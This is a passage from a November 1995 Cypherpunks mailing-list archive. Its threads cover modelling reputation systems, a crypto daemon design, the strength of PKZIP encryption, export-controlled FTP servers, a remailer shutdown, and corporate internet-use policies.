>a major price cut, or the replacement cost may suddenly decrease when 
>he succeeds subverting a respected reputation agency.

It would be useful to make some of the assumptions a bit clearer here.
Is this a system in which cheating is unpunishable other than by loss of
reputation, our classic anonymous marketplace?  Even if so, there may be
other considerations.  For example, cheating may have costs, such as
timing the various frauds so that people don't find out and extricate
themselves from vulnerable situations before they can get stung.  Also,
as has been suggested here in the past, people may structure their
interactions so that vulnerabilities to cheating are minimized, reducing
the possible profits from that strategy.

>One way to answer some of these questions may be to create a model of 
>a reputation system with a simple reputation algorithm and a simplified 
>market, and determine by analysis or simulation whether it has the 
>desirable properties.  I hope someone who has an economist friend can 
>persuade him to do this.

It might be interesting to do something similar to Axelrod's Evolution
of Cooperation, where (human-written) programs played the Prisoner's
Dilemma against each other.  In that game, programs had reputations in
a sense, in that each program when it interacted with another
remembered all their previous interactions, and chose its behavior
accordingly.  The PD is such a cut-throat game that it apparently
didn't prove useful to try to create an elaborate reputation-updating
model (at least in the first tournaments; I understand that in later
versions some programs with slightly non-trivial complexity did well).

What you might want to do, for simplicity, is to have your universe
consist of just one good (or service, or whatever), with some producers
who all have the same ability, and some consumers, all with the same
needs.  Where they differ would be in their strategies for when to
cheat, when to be honest, when to trust, and when to be careful.

At any given time a consumer must choose which producer to buy from.
The details of their interaction would appear to greatly influence the
importance of reputation.  Maybe there could be a tradeoff where if the
consumer is willing to pay in advance he gets a better price than if he
will only provide cash on delivery.  (Unfortunately it seems like the
details of this tradeoff will basically determine the outcome of the
experiment.  However maybe some values will lead to interesting
behavior.)  Producers who want to cheat could do so by offering greater
discounts for payment in advance, offering low prices in order to
attract as many customers as possible before disappearing.  Consumers
might rightly be suspicious of an offer that looks too good.

Maybe it could be set up so consumers could cheat, too.  No, I think that
is too complicated.  Then producers would have to know consumers'
reputations and I think it gets muddy.  Probably it would be simplest to
just have producers have reputations.

Hal





From perry at piermont.com  Wed Nov 22 08:10:33 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 22 Nov 95 08:10:33 PST
Subject: rand-test
In-Reply-To: <Pine.BSD.3.91.951122041655.28519J-100000@ahcbsd1.ovnet.com>
Message-ID: <199511221609.LAA21172@jekyll.piermont.com>



"James M. Cobb" writes:
> Friend, 
>  
>  
> The following information from 

1) You are not my friend.

2) My private mail to you hasn't convinced you to stop this barrage of
   reposts. Would you please do so?

.pm






From jya at pipeline.com  Tue Nov 21 16:10:49 1995
From: jya at pipeline.com (John Young)
Date: Wed, 22 Nov 1995 08:10:49 +0800
Subject: [NOISE] Interesting statement by Alameda County DA
Message-ID: <199511212334.SAA02295@pipe1.nyc.pipeline.com>



Responding to msg by iang at cory.EECS.Berkeley.EDU (Ian Goldberg) 
on Tue, 21 Nov  1:50 PM

>One of the speakers was Don Ingraham, Assistant 
>District Attorney,  Alameda County.  In responding to a 
>question from the audience, he said:
>
>"You're making a distinction between criminals and big 
>business.
>    That is not my experience."


   Assistant Devil's Angel Ingraham cites two out of three,
   the other is the omnipresent public safety racket -- his
   temp job in train to future peace by salubrious punishment
   of the other two overtense sinners.

   Often, a backlasher rep in one leads to a pretend-
   thrasher slot in the others. RICO, for instance, is an
   ingenious selective-caning law for flyswatting one
   conspirator by another but to not go so far as to bruise
   flesh and foreclose franchises for prosecutorial
   "shiatsu."

   This ancient soft-drubbing by one of the others is meant to
   conceal their common-origin ritual of corporeal writhings,
   manipulations, strokings, caresses and digitizers to debase
   from upright to bent to kneeling to prone succeeding down
   ladder, applying lubricants, linguants, unguents, balms, 
   dental whiteners and body hair to head, to rest six under.

   Criminal, financial, legal -- indistinguishable from any
   other mortality-salving levitationism.

   -- From The One Outback Truth.


>   "Hey, Ian _said_ it was noise."





From lwp at conch.aa.msen.com  Tue Nov 21 16:35:54 1995
From: lwp at conch.aa.msen.com (Lou Poppler)
Date: Wed, 22 Nov 1995 08:35:54 +0800
Subject: Mandarins, Lifers, and Talents
In-Reply-To: <v02120d07acd12fd83388@[199.0.65.105]>
Message-ID: <NHeswMz2B8gV083yn@mail.msen.com>


On Thu, 16 Nov 1995 16:02:09 -0500,
rah at shipwright.com (Robert Hettinga) wrote:
} One of my messier theories about the internet is that it was invented by
} mandarins. Now the talents, the people you call pioneers, have moved in,
} and they're much more pragmatic, and have little patience for crystalline
} perfection, because inefficiency and chaos is where they find beauty, joy,
} and all those other nasty imprecise concepts. When thing settle down a bit,
} the lifers will come.  They're trying to do it now, by building sites like
} www.time.com, or buying into sites like www.wired.com.

Waitaminute, I still remember the Old Days. 
I helped run one corner of the MERIT network, back when it only offered
proto-telnet interactive connections to three mainframes total.  
The network ran on PDP-11s lashed crudely to our mainframes and connected 
to each other on 4800 baud leased lines (half-duplex).

Mandarins were involved in the genesis, certainly, both of our little 
college network, and of the military's arpanet.  The mandarins provided
our subsidies, and some of them found ways to use the net in doing their
academic work.  Very many of them ignored us.  Among us paid computer staff,
the mandarins held occasional blue-sky meetings to plot the future and
standards for the future; the lifers went about their business of feeding
hollerith cards to the mainframes; and the talents immediately set about
exploring this orthogonal new quirk of their machine.  All the edges were
rough in the beginning, and for a long time after the beginning.  Network
code arrived in huge inspired chunks from our eccentric talents.  Other
talents, staff and user alike, would go out to play on the network and
find little suggestions for the eccentric talents responsible.

I think the early networks were less than satisfying for the mandarins.
It required arcane mandarin accounting schemes to rationalize our
perpetual defecits, even in a 'funny money' accounting world.
Policies and standards were strained by the sudden accessibility of 
the foreign operations, under alien chains of command.  The networks
were immediately untidy and required compromise from the user.

The biggest contribution from the mandarins, and I mean this with 
all gratitude, is that they chose, again and again, not to shut us down.

ObCrypto: we were still getting the bugs out of rot13 back then.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::   Lou Poppler  <lwp at mail.msen.com>    |    http://www.msen.com/~lwp/   ::
::        * Support The Phil Zimmermann legal defense fund *              ::
::                http://www.netresponse.com/zldf                         ::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::





From s1113645 at tesla.cc.uottawa.ca  Tue Nov 21 16:42:52 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Wed, 22 Nov 1995 08:42:52 +0800
Subject: Proving I'm not Bob.
In-Reply-To: <Pine.NXT.3.91.951121142858.1144A-100000@litoria>
Message-ID: <Pine.3.89.9511211956.A45492-0100000@tesla.cc.uottawa.ca>




On Tue, 21 Nov 1995, David Scheidt wrote:

> What is this system?  I can't think of any system that wouldn't work if 
> rearranged so that instead of proving you aren't Bob, you simply don't 
> prove that you are.  It is true that they are not isomorphic, and that 
> could be a problem in some situations, but I don't see this as one of them.

Hal and Futplex pretty much described it. I figured a proof of non-identity
(if possible) would have saved one hell of a lot of messy authentication
in those cases when there is only one possible cheater (due to economic 
incentives) with many possible pseudonyms (or friends).





From cme at TIS.COM  Wed Nov 22 08:51:06 1995
From: cme at TIS.COM (Carl Ellison)
Date: Wed, 22 Nov 95 08:51:06 PST
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <199511212323.PAA02457@comsec.com>
Message-ID: <9511221641.AA14712@tis.com>


>Date: Sat, 18 Nov 1995 00:42:21 -0800 (PST)
>From: Raph Levien <raph at c2.org>


>   First, a few words about what I consider to be good interface that
>can support plug-in crypto.

[...]

>   I propose that the new interface lives as a sort of daemon, rather
>than a static collection of command line script pieces. 

Danger, Will Robinson!  (see below)

[...]


>   Once the negotation has been established, the application can send
>the daemon MIME objects that the app does not understand but the
>daemon does (for example, an image/fractal). The daemon can return a
>MIME object that the app does understand (for example, an image/ppm).

This part sounds good...a sort of master translation service.

>   Alternatively, the daemon may request an authentication. This is
>useful when resolving external bodies that require authentication,
>including non-anonymous FTP, and standard authenticated HTTP. In this
>case, the daemon sends a message to the app requesting the
>authentication. It specifies whether it needs both username and
>password, or just password. In the latter case, it hands a username to
>the application.
>   The application can then query the user for the authentication
>data. It hands this back to the daemon. In reply, the daemon indicates
>success or failure. In case of success, it hands the object back to
>the app.

Now I get worried.  This communication with the demon is via some IPC --
maybe even via a LAN.  Some things can't be distributed safely and
authentication is #2 on my list.

>   Encryption is a bit more tricky, but in essence you just hang a
>premail-alike off this kind of protocol. The hard part is specifying
>the key, but you just call it a "parameter" and put in hooks for the
>daemon to ask for whatever parameters it needs. 

Crypto keys are #1 on my list of things you can't distribute (unless they
are wrapped, of course).

>						 This requires that
>keys have some nonforgeable names, which is unfortunately not a
>feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
>Certifcation Authority (<wink> at Nick Szabo).

Public keys, if that's what you're talking about, have perfectly good
nonforgeable names -- themselves.  They are unique.  They are the proper
name which can collect all the attributes of that key which are of interest
(e.g., permission to spend $, name of a human who knows the private key,
attributes about that human, etc.).

>   One final aside: I've been fairly frustrated with this mailing list
>as a forum for talking about real design proposals and implementation
>issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
>tend to attract far more attention than real crypto work. I want a
>forum for, and just for, cypherpunks who write code. If I had just a
>smidgen more free time (as if), I'd be trying to start one
>myself. Anyone else?

I've seen this happen several times.  As a list gets popular, it
diversifies.  You might try sci.crypt.research -- since it's moderated.

 - Carl


+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+





From weld at l0pht.com  Wed Nov 22 08:54:21 1995
From: weld at l0pht.com (Weld Pond)
Date: Wed, 22 Nov 95 08:54:21 PST
Subject: Pedophiles use encoding devices to make secret use of Internet
Message-ID: <Pine.BSD/.3.91.951122114132.23151A-100000@l0pht.com>


I guess they moved the URL. Try this one.

http://www.nando.net/newsroom/ntn/info/112195/info429_4.html

      Weld Pond   -  weld at l0pht.com   -   http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio






From ses at tipper.oit.unc.edu  Wed Nov 22 09:09:18 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Wed, 22 Nov 95 09:09:18 PST
Subject: Secrets of the Internet
In-Reply-To: <Pine.BSD.3.91.951122041435.28519I-100000@ahcbsd1.ovnet.com>
Message-ID: <Pine.SOL.3.91.951122090738.23852B-100000@chivalry>


On Wed, 22 Nov 1995, James M. Cobb wrote:
>            known as PGP -- Pretty Good Privacy -- 
> and 
>    Experts estimate that it could take 10 years for computer 
>    systems to crack the individual codes. 

Never underestimate the power of GCHQ- when they unfreeze Alan Turing 
from the cryogenic vault, good things happen.





From perry at piermont.com  Tue Nov 21 18:55:41 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 22 Nov 1995 10:55:41 +0800
Subject: PKZIP - Encryption
In-Reply-To: <Pine.A32.3.91.951122035639.51855A-100000@carmel.haifa.ac.il>
Message-ID: <199511220223.VAA18118@jekyll.piermont.com>



"L. DEkel" writes:
> PKZIP Encryption:
> 
> PKZIP encryption is often said to be: Weak, "a joke" ,"a deception" etc.
> Maybe it's time to put things in the right perspective.
> 
> One must realize (yet again) the difference between:
> Theoretical Cryptography - and - Practical Cryptography:

Er, I don't understand.

I could see why one would want to use a weak encryption system if it
bought you something. However, good encryption systems are as cheap to
use as bad ones. Therefore, why ever use a bad one? If the top of the
line lock costs the same amount as a toy lock, why buy a toy?

Perry





From weld at l0pht.com  Tue Nov 21 19:01:17 1995
From: weld at l0pht.com (Weld Pond)
Date: Wed, 22 Nov 1995 11:01:17 +0800
Subject: Pedophiles use encoding devices to make secret use of Internet
Message-ID: <Pine.BSD/.3.91.951121205509.15079A-100000@l0pht.com>



Story in Nando Times

http://www2.nando.net/newsroom/ntn/info/info429_4.html


      Weld Pond   -  weld at l0pht.com   -   http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio






From jsw at netscape.com  Tue Nov 21 19:10:00 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Wed, 22 Nov 1995 11:10:00 +0800
Subject: Export control FTP servers
In-Reply-To: <9511210441.AA26515@sulphur.osf.org>
Message-ID: <30B28957.4C06@netscape.com>


I thought that they had not yet released their official policy.  Last
time I heard they were still refusing to put anything in writing saying
that your measures were "ok", pending release of their official policy.

  If John is indeed leaving, this will give the powers-that-be an
excuse to delay even longer.

	--Jeff

attila wrote:
> 
> well, since it is "official" policy and the basics concern rejecting all
> foreign addresses and making the proposed recipient agree to a file
> statement agreeing not to export and that he/she/it is an American or
> Canadian citizen, it might be nice if someone who has the `sed ....`
> and/or `awk...` scripts would post them for all to use (with whatever
> disclaimers, etc.)
> 
> On Mon, 20 Nov 1995, Rich Salz wrote:
> 
> > >     I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> > >and sed. I didn't get the NSA to approve it, but I figure if it's good
> > >enough for RSADSI it's good enough for me.
> >
> > I believe some of the following has been posted here before.
> > The person to speak with is
> >       John Sonderman
> >       Office of Defense Trade
> >       Department of Compliance
> >       703 875 6644
> > He's supposed to be Internet-aware.   What's not common knowledge is
> > that he's leaving by early December for budgetary reasons.  If you're
> > thinking of putting export controlled stuff up for FTP, you should
> > probably contact John now.
> >       /r$
> >

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From fstuart at vetmed.auburn.edu  Tue Nov 21 19:38:50 1995
From: fstuart at vetmed.auburn.edu (Frank Stuart)
Date: Wed, 22 Nov 1995 11:38:50 +0800
Subject: Spam the Sign!
Message-ID: <199511220307.VAA01713@snoopy.vetmed.auburn.edu>


[...]
>  Do you have a legal opinion to support this statement?  Our lawyers
>tell us that executives of netscape could go to jail if we make the
>128bit version of netscape available from an "export controlled"
>ftp or http server.  We are working to clarify the situation with
>the government or figure out an alternative distribution scheme that
>will remove us from the grey area.

No legal opinions here, but perhaps you give it to someone who you know is
legally entitled to have it and give them permission to redistribute it.  For
example, MIT, RSA, and c2.org already distribute export-controlled software
via FTP, so if they're willing, you could give copies to people there and
publish MD5 checksums.

>  Getting the US version of netscape widely available is one of my
>highest priorities, but I can't tell Barksdale that he should go to
>jail over it.  I'm constantly pushing from within the company to keep
>things moving forward.

It's appreciated as is your participation here.

>  In the mean time I appologize to the linux users who can't even
>buy the 128 bit version.  If something changes on this front I'll
>be sure to let people know.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart at vetmed.auburn.edu | when you take into account Hofstadter's Law.







From skaplin at mirage.skypoint.com  Tue Nov 21 19:44:30 1995
From: skaplin at mirage.skypoint.com (Sam Kaplin)
Date: Wed, 22 Nov 1995 11:44:30 +0800
Subject: Syrinx Remailer is no more
Message-ID: <30b29639.13106184@popmail.skypoint.com>


Effective immediately syrinx at c2.org is no more. I no longer have the
time to keep this remailer up and running. Perhaps somewhere down the
line I will set up another one. Please remove Syrinx from your chains.

Sam





From llurch at networking.stanford.edu  Tue Nov 21 20:03:28 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Wed, 22 Nov 1995 12:03:28 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130512acd7941208f9@[199.125.128.5]>
Message-ID: <Pine.ULT.3.91.951121193502.5283A-100000@Networking.Stanford.EDU>


Don't the numbers include all types of interceptions, both wiretaps and 
records of what number you call?

You also don't need to listen live. Recording media is cheap these days. 
Record all calls, put into a database keyed by time and number called, 
refer to it later.

-rich





From dekel at carmel.haifa.ac.il  Tue Nov 21 21:09:27 1995
From: dekel at carmel.haifa.ac.il (L. DEkel)
Date: Wed, 22 Nov 1995 13:09:27 +0800
Subject: PKZIP - Encryption
Message-ID: <Pine.A32.3.91.951122064257.46049A-100000@carmel.haifa.ac.il>



    "L. DEkel" writes:
>> PKZIP Encryption:
>>
>> PKZIP encryption is often said to be: Weak, "a joke" ,"a deception" etc.
>> Maybe it's time to put things in the right perspective.
>>
>> One must realize (yet again) the difference between:
>> Theoretical Cryptography - and - Practical Cryptography:

    "Perry E. Metzger" writes:
> I could see why one would want to use a weak encryption system if it
> bought you something. However, good encryption systems are as cheap to
> use as bad ones. Therefore, why ever use a bad one? If the top of the
> line lock costs the same amount as a toy lock, why buy a toy?

Your remark is basically correct, here are few clarifications:

I didn't recommended PKZIP for encryption, I said it's an Archiver that has an
option to encrypt it's files, and that Practically this encryption is not so
bad as people think.
About costs: a complete system, including hardware, to support "full armor"
for a computer, is far more expensive than using PKZIP, so the question is
again of money, but that depends of what you're trying to encrypt.
If you are a bank for example, it would make sense to spend several thousands
on such a system, if you just send your friend a letter once in a while,
containing a movies lists, than PKZIP is enough, you don't have do use say PGP.
An good opposite example is PGP: you could define it as an Encrypter which has
an archiving option (Of course it archives for the purpose of encryption),
so why not use PGP as an archiver instead of PKZIP ?
Because:
There is the question of convenience (security=1/convenience - postulate),
people don't like to pass their plaintext through several utils, where one
compresses it, the other encrypts etc., they want a convenient util to use.
But:
Who says this old postulate (security=1/convenience) is correct today ?
you can write a program/script/batch to do all sorts of dirty jobs, why not
write a multi-purpose: compression/encryption/mailing/etc. system ?
or just use a simple script/batch util to "glue" the different utils together ?
Of course it has been done: (here are some examples)
compression/encryption system - with HPACK archiver which uses PGP,
                                 the UC2 (PRO) archiver which uses 3DES.
encryption/mailing(sometimes with compression) system - PEM, RIPEM etc.
More problems there:
These utils are not "standard" as yet, many people say they want a
popular archiver where they know "everybody" use, and PKZIP is among the
popular and multi-featured among the archivers, so why,they say, would they
bother to adopt an esoteric encrypter or archiver ?
The main problem:
people are not "privacy protecting" oriented, they don't care too much about
the subject.
("who will bother to crack this system just to read my mail ?")

What do we do ? Educate them of course.
That is why the spread of knowledge in the subject is so important.
(Knowledge, not unsubstantiated rumors).

All in all, there is no reason not to use a crypto system, if you think your
privacy/safety are in danger.
I claim that in this world of compromises, choosing PKZIP is not as bad as
presented, knowledge should be passed to all user about the risks involving
the use of one system or the other, but there is too much rumors that obscure
the subject and can misguide a user, not versed in the field of cryptography.
And if you "must", choose PKZIP (it is better encrypting then none, and better
than some, like ARJ, but certainly not among the best).


,,,,,,,,,,,,,
DEkel (noXys)
'''''''''''''








From dlv at bwalk.dm.com  Tue Nov 21 21:23:12 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 22 Nov 1995 13:23:12 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To: <199511210731.XAA08374@jobe.shell.portal.com>
Message-ID: <yo9XeD2w165w@bwalk.dm.com>


Alice de Nonymous writes:
[dlv]
> > Fred is right. I used to work for Goldman Sachs & their internet usage
> > policy stated that when you write to Internet or Usenet from a GS account,
> > it will reflect on the firm no matter how you disclaim it.

[alice]
> I think this is true, and is where we start to get into reputations and
> trust.
>
> If someone from Goldman Sachs posts to a Usenet group discussing abortion
> or gun-control, and says that: "These opinions are my own and not my
> employers."  Then, we can accept that, no matter how silly their opinions
> are.

Unfortunately, most employers won't accept this. A couple of years ago Sun
Micro fired Philip Stromer for posting homophobic jokes to Usenet. A good
friend of mine was fired from Microsoft for sending politically incorrect
articles to a Ukrainian mailing list. (He was born in Ukraine.) Someone
complained to MS and he was axed. Interestingly, most of his offensive messages
came from his CompuServe account; only a couple of tamer ones were from his
microsoft.com address. The complainer and Microsoft apparently felt that since
he was known to work for Microsoft, it didn't matter that he posted mostly from
Compuserve.

I think Goldman's policy on Internet use is pretty reasonable. I'm attaching
at the end a couple of interesting e-mails that explain their philosophy.

> But there is a difference in the way we look at it if someone from Goldman
> Sachs posts to misc.invest.stocks instead and says that the Goldman Sachs
> Strip Coupon Fund is better than the one from Merrill Lynch -- that it's
> safer and produces higher returns because Goldman uses cubic spline
> interpolation methodologies to interpolate the yield curve, while Merrill
> Lynch doesn't.  There is a difference here.

Hmm... If it looks remotely like marketing, it'd better carry the usual
disclaimers that past returns are no indication of future returns etc. :)

> In the first case, the poster is not commenting about anything to do with
> their work, -- it really is just one man's opinion -- while in the second
> they are actually commenting upon something their employer is selling.

Even in the first case, the poster is using a Goldman e-mail address, which is
comparable to using Goldman stationery to write a personal letter. If he says
something pro- or anti-gun/abortion that might antagonize a potential client
and cause him not to do business with GS, then GS is right not to like this.

> If the employee tries to add, "these opinions are my own, and do not
> reflect the opinion of my employer" then we have a huge credibility
> problem.

I think these disclaimers are just silly and can't be taken seriously.
If he posted an article to alt.sex.pedophile discussing his desire to have
sex with children, surely this would reflect on Goldman no matter how he
disclaimed it, and he would deservedly be in trouble.

> You really can't have it both ways.  You can't post officially and
> unofficially at the same time, unless it really does have nothing to do
> with your work.

Goldman's policy seems to indicate that if you post from a commercial
ISP and don't claim to speak on behalf of Goldman, they don't care what
they say. This is better than some...

But consider this hypo. Joe Shmoe, an analyst with GS Research, posts an
article to misc.invest.* saying that he likes stock XYZZY. He posts from
another ISP and doesn't mention that he works for Goldman. But one of the many
kooks that invest misc.invest.* recognized Joe and shouts: *LOOK! THIS IS JOE
SHMOE FROM GS RESEARCH! *. At which point, the readers take Joe Shmoe's
postings much more seriously, and Goldman asks him whether he's put XYZZY on
the restricted list. (Disclaimer: I definitely don't speak for Goldman and am
just supposing what might happen in a situation like this :)

> If you post from Sun Engineering, and you are posting to a group that
> focuses on Sun, and you are talking about a Sun product, then people are
> going to take your comments as an official statement from Sun. You are
> that product's spokesperson, whether you disclaim or not, and should act
> accordingly.  No matter what, that's the way people are going to see it.

I would venture as far as to say that if you post from Netcom, but are known to
work for X, then you have much more crediblity speaking about X's products or
future plans that some unknown person. Your reputation is thus both enhanced by
X and partially owned by X. X would be within its right to ask you not to speak
about X's affairs in public. The readers would have the right to assume that
you know more about X's affairs and deicision-making than someone from the
street. Greater credibility carries with it greater responsibility, both to X
and to the readers. If you want a reputation that's independent from X, you
could get an ISP account under an assumed name, or post via an anonymous
remailer, and build a reputation from scratch.

Here are a couple of quotes regarding Goldman's Internet usage guidelines:

-----------------------------------------------------------------------------
Date: Wed, 10 May 1995 12:35:49 -0400
Resent-From: dimitry.vulis at nyapps01.gsam.gs.com (DLV)
From: Gary Schermerhorn <gary.schermerhorn at nyapps01.gsam.gs.com>
Subject: Internet GuideLines
To: gsamit at athena.fi.gs.com
Message-Id: <199505101635.MAA27299 at nyapps01.gsam.gs.com>
Mime-Version: 1.0
X-Mailer: Z-Mail (3.2.0 06sep94)
X-Mailer: Mozilla/0.96 Beta (Windows)
Content-Type: text/plain;  charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Many of you have asked me for the firm's Internet Guidelines.  I have
attached them below.  Call me or Hans if you have any questions.

> [Image] Internet Access (including Internet mail)
>
>     ------------------------------------------------------------------------
>
> The Firm has clear policies on the appropriate usage of computer
> resources listed in a pamphlet entitled "The Keys To Information
> Security". This pamphlet is distributed to all new employees during
> their New Employee Orientation on the first day of employment. The
> policy in part:
>
>      Goldman Sachs' computers and software should be used for
>      business purposes only. Software and data created on Firm
>      systems or by Firm employees are the property of Goldman
>      Sachs. Only authorized use of the systems is permitted.
>
> You should be aware that unauthorized use of the systems may result in
> disciplinary action by the Firm, possibly including termination.
>
>     ------------------------------------------------------------------------
>
> Q: What does "for business purposes only" mean?
>
> A: It means that except for de minimis personal use, you should only
> use the Internet (including Mosaic and Internet mail) for tasks
> related to your job function.
>
>     ------------------------------------------------------------------------
>
> Q: Does this mean I cannot browse the Internet unless I know what I'm
> retrieving?
>
> A: The Internet is a resource beyond comprehension; even some of the
> Firm's veteran Internet surfers do not know about most of it. Browsing
> the Internet while looking for business-related resources is
> acceptable. Browsing the Internet with the intent of looking for
> non-business-related resources (such as the latest copy of Tetris) is
> not acceptable. Using the Internet to retrieve recreational pictures
> and other non-business items is not acceptable.
>
>     ------------------------------------------------------------------------
>
> Q: What if I have an Internet application I want to use that isn't
> currently supported?
>
> A: Consult with the Information Security group (unix at is.gs.com).
>
>     ------------------------------------------------------------------------
>
> Q: How does anyone know what I look at on the Internet?
>
> A: All Internet services leave an audit trail which is kept by the
> Information Security group. This logfile can be requested by your
> manager.
>
>     ------------------------------------------------------------------------
>
> Q: Why is the Firm concerned about Internet access?
>
> A: There is a charge to the Firm for the Internet use time. Other than
> de minimis personal use, non-business use constitutes theft of Firm
> property.
>
> In addition, many Internet applications (especially Mosaic) can
> potentially consume large amounts of network bandwidth. This has a
> significant impact upon your environment and can consume limited
> shared resources such as bandwidth and CPU. Heavy recreational usage
> of Internet services could consume bandwidth needed to deliver
> critical business data.
>
> Furthermore, certain accessed materials such as sexually-oriented
> materials may be offensive to others whom it is visible.
>
> Finally, when you send mail or news out to the Internet from a Firm
> system, you not only leave a trail throughout the Internet with the
> Goldman's name on it, but you also provide people on the Internet with
> an impression of Goldman, regardless of how you disclaim it. Plainly
> put, do not use the Internet (including email and news) for
> non-business related work.
>
>     ------------------------------------------------------------------------
>
> Q: How does this apply to Internet mail?
>
> A: Internet mail follows the same guidelines as Internet connections.
> You should not use Internet mail for purpose not related to your job
> function. One example of an appropriate usage would be for a system
> administrator to use a mailing list to learn more about a particular
> software package, such as Kerberos.
>
> An inappropriate use would be if you joined a list of bicyclists in
> the area and had that mail sent to your email account at work. Such
> mail is not related to your job-function (unless you happen to be the
> Goldman Investment Research Analyst assigned to bicyclists on the
> Information Superhighway).
>
>     ------------------------------------------------------------------------
>
> Q: So is it okay to correspond with clients through Internet mail?
>
> A: Communicating with clients is carefully controlled by the
> Compliance people in for your business unit. You should obtain the
> same internal approvals when sending email to clients over the
> Internet as you get when sending paper mail to them. If you have any
> questions, check with your Compliance person first; do not send email
> to a client with the intention of resolving these issues later.
>
>     ------------------------------------------------------------------------
>
> Q: What about Usenet news and mailing lists?
>
> A: When you post to Usenet news or send mail to a mailing list, you
> are providing an impression to the world of Goldman. Even if you
> "disclaim" what you are saying as "only your opinions", anything you
> say will continue to reflect on the Firm. Do not use news and mailing
> lists for personal or non-business purposes.
>
>     ------------------------------------------------------------------------
>
> Q: I really want to play with the Internet without all these
> constraints, what should I do?
>
> A: There are dozens of business that provide personal connections to
> the Internet for a very low cost (between $10 and $30 / month). If you
> want to explore the Internet, purchase a membership for one of the
> these services and explore the Internet on your own time, without
> using Firm computers or networks.
>
>     ------------------------------------------------------------------------
>
> Q: Where should I go if I have more questions?
>
> A: Your supervisor can help you determine what Internet resources may
> or may not be related to your job function.
>
>     ------------------------------------------------------------------------
>
> Unix Information Security Staff / webmaster at is.gs.com


-----------------------------------------------------------------------------
Date: Mon, 08 May 1995 12:09:27 -0400
From: Gary Schermerhorn <gary.schermerhorn at nyapps01.gsam.gs.com>
Subject: Internet Usage
To: gsam.all at athena.fi.gs.com
Message-Id: <9505081209.ZM11783 at itpc01>
Mime-Version: 1.0
X-Mailer: ZM-Win (3.2.1 11Sep94)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7BIT

Just a reminder about Internet usage policy; Please read the 'Internet Access
Policy' statement, which is available on the GSAM Home page, or email me and I
will send you a copy.

ALL World Wide Web accesses are monitored against a list of known servers and
keywords which are understood to be inappropriate.  This list is available to me
each month.  You should all avoid Web access that will end up on this list.
Inappropiate use of the Web is equivalent to inappropriate phone usage (e.g.,
900 numbers).

Please read the Internet Access Guidelines.  Encourage your staff, particularly
new staff, to read them also.  The spirit of the guidelines is very clear.
Thanks.

--
Gary Schermerhorn                  (scherg at gsam.gs.com)
Goldman Sachs Asset Management
(212) 902-3344 (phone)
(212) 902-1384 (fax)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From jamesd at echeque.com  Tue Nov 21 21:43:33 1995
From: jamesd at echeque.com (James A. Donald)
Date: Wed, 22 Nov 1995 13:43:33 +0800
Subject: towards a theory of reputation
Message-ID: <199511220523.VAA28300@blob.best.net>


At 01:14 PM 11/21/95 -0800, Wei Dai wrote:
> The first step toward a theory of reputation is defining what reputation 
> is.  [...]  If these interactions are mainly economic in nature, 
> then we can represent Alice's reputation of Bob by a graph with 
> the horizontal axis labeled price and the vertical axis labeled 
> expected utility. 

Any attempt to discuss and analyze reputations using
morally neutral language is bound to wind up as boring long
winded meaningless complicated word salad.

You will wind up in the same place as the behaviorists did,
going in ever diminishing epistemological circles until you
vanish into the whichness of why and the whyness of which.

Some things, for example reputations, behavior, or the 
principle of mathematical induction, necessarily involve 
concepts that are philosophically problematical.   Any attempt
to discuss these things while avoiding philosophically
problematic concepts invariably degenerates into total fog.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From kinney at bogart.Colorado.EDU  Tue Nov 21 22:31:03 1995
From: kinney at bogart.Colorado.EDU (W. Kinney)
Date: Wed, 22 Nov 1995 14:31:03 +0800
Subject: PKZIP - Encryption
In-Reply-To: <Pine.A32.3.91.951122064257.46049A-100000@carmel.haifa.ac.il>
Message-ID: <199511220607.XAA12915@bogart.Colorado.EDU>



L. DEkel writes:

>
>     "Perry E. Metzger" writes:
> > I could see why one would want to use a weak encryption system if it
> > bought you something. However, good encryption systems are as cheap to
> > use as bad ones. Therefore, why ever use a bad one? If the top of the
> > line lock costs the same amount as a toy lock, why buy a toy?
> 
> There is the question of convenience (security=1/convenience - postulate),
> people don't like to pass their plaintext through several utils, where one
> compresses it, the other encrypts etc., they want a convenient util to use.

I think the point is that the postulate is true only because the people
who write "convenient" software usually either don't have a proper clue
about security or are afraid of crossing ITAR. Secure encryption algorithms
